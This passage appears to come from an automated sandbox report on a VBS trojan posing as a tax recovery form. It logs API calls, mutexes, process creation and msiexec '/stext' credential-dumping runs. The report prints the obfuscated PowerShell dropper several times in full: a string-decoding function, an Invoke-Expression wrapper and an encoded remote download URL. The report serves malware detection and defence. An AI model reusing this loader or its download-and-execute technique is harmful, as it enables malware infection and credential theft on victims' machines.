relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBl Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 12_2_0040DD85
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00401806 NtdllDefWindowProc_W, 12_2_00401806
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004018C0 NtdllDefWindowProc_W, 12_2_004018C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004016FD NtdllDefWindowProc_A, 13_2_004016FD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004017B7 NtdllDefWindowProc_A, 13_2_004017B7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00402CAC NtdllDefWindowProc_A, 14_2_00402CAC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00402D66 NtdllDefWindowProc_A, 14_2_00402D66
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD3455B286 2_2_00007FFD3455B286
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD3455C032 2_2_00007FFD3455C032
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD34556645 2_2_00007FFD34556645
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD345516C9 2_2_00007FFD345516C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04EDF340 4_2_04EDF340
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04EDFC10 4_2_04EDFC10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04EDEFF8 4_2_04EDEFF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_2359B5C1 9_2_2359B5C1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_235A7194 9_2_235A7194
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044B040 12_2_0044B040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0043610D 12_2_0043610D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00447310 12_2_00447310
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044A490 12_2_0044A490
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0040755A 12_2_0040755A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0043C560 12_2_0043C560
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044B610 12_2_0044B610
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044D6C0 12_2_0044D6C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004476F0 12_2_004476F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044B870 12_2_0044B870
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044081D 12_2_0044081D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00414957 12_2_00414957
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004079EE 12_2_004079EE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00407AEB 12_2_00407AEB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044AA80 12_2_0044AA80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00412AA9 12_2_00412AA9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00404B74 12_2_00404B74
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00404B03 12_2_00404B03
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044BBD8 12_2_0044BBD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00404BE5 12_2_00404BE5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00404C76 12_2_00404C76
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00415CFE 12_2_00415CFE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00416D72 12_2_00416D72
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00446D30 12_2_00446D30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00446D8B 12_2_00446D8B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00406E8F 12_2_00406E8F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00405038 13_2_00405038
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0041208C 13_2_0041208C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004050A9 13_2_004050A9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040511A 13_2_0040511A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0043C13A 13_2_0043C13A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004051AB 13_2_004051AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00449300 13_2_00449300
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040D322 13_2_0040D322
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044A4F0 13_2_0044A4F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0043A5AB 13_2_0043A5AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00413631 13_2_00413631
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00446690 13_2_00446690
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044A730 13_2_0044A730
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004398D8 13_2_004398D8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004498E0 13_2_004498E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044A886 13_2_0044A886
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0043DA09 13_2_0043DA09
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00438D5E 13_2_00438D5E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00449ED0 13_2_00449ED0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0041FE83 13_2_0041FE83
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00430F54 13_2_00430F54
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004050C2 14_2_004050C2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004014AB 14_2_004014AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00405133 14_2_00405133
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004051A4 14_2_004051A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00401246 14_2_00401246
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0040CA46 14_2_0040CA46
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00405235 14_2_00405235
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004032C8 14_2_004032C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00401689 14_2_00401689
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00402F60 14_2_00402F60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004165FF appears 35 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00413025 appears 79 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00416760 appears 69 times
Source: Custom Export Tax Recovery Form.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5321
Source: unknown Process created: Commandline size = 5321
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5321 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@14/12@2/3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free, 12_2_004182CE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle, 14_2_00410DE1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, 12_2_00418758
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle, 12_2_00413D4C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource, 12_2_004148B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Enspnderen.rep Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-UXHRJ7
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xr2maw1d.c0f.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Custom Export Tax Recovery Form.vbs"
Source: C:\Windows\SysWOW64\msiexec.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1908
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=988
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: msiexec.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: msiexec.exe Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: msiexec.exe, 00000009.00000002.3418729616.00000000239E0000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: msiexec.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: msiexec.exe Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: msiexec.exe Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: msiexec.exe Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Windows\SysWOW64\msiexec.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Custom Export Tax Recovery Form.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ncxgt"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ywcrugzm"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\izpjvzjnjwl"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBl Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ncxgt" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ywcrugzm" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\izpjvzjnjwl" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
